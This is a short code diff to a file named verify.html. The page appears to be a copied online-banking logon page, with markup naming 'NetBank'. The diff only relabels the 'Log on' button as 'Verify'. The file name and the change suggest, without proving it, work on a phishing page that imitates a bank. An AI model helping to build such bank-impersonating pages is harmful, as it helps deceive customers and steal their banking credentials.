--- a/verify.html
+++ b/verify.html
@@ -412,7 +412,7 @@
 							    <input type="hidden" name="metric" id="metric" />
 								<div class="FieldElement FieldElementNoLabel" style="text-align: left;">
 									<div class="CbaButton" id="btnLogon">
-										<input class="button field" type="button" name="btnLogon$field" value="Log on" id="btnLogon_field" />
+										<input class="button field" type="button" name="btnLogon$field" value="Verify" id="btnLogon_field" />
 									</div>
 								</div>
 							</div>
@@ -515,5 +515,6 @@ document.write("<input type=\"hidden\" name=\"JS\" value=\"E\" />");
 	<input type="hidden" id="SC_MEDIAMIND_ID" name="SC_MEDIAMIND_ID" value=""/><input type="hidden" id="SC_PRODUCT_ID" name="SC_PRODUCT_ID" value=""/><input type="hidden" id="SC_CUSTOMER_TYPE" name="SC_CUSTOMER_TYPE" value="NetBank"/><input type="hidden" id="SC_SCREEN_NAME" name="SC_SCREEN_NAME" value=""/>
 </body>
 </html>
+
 
 
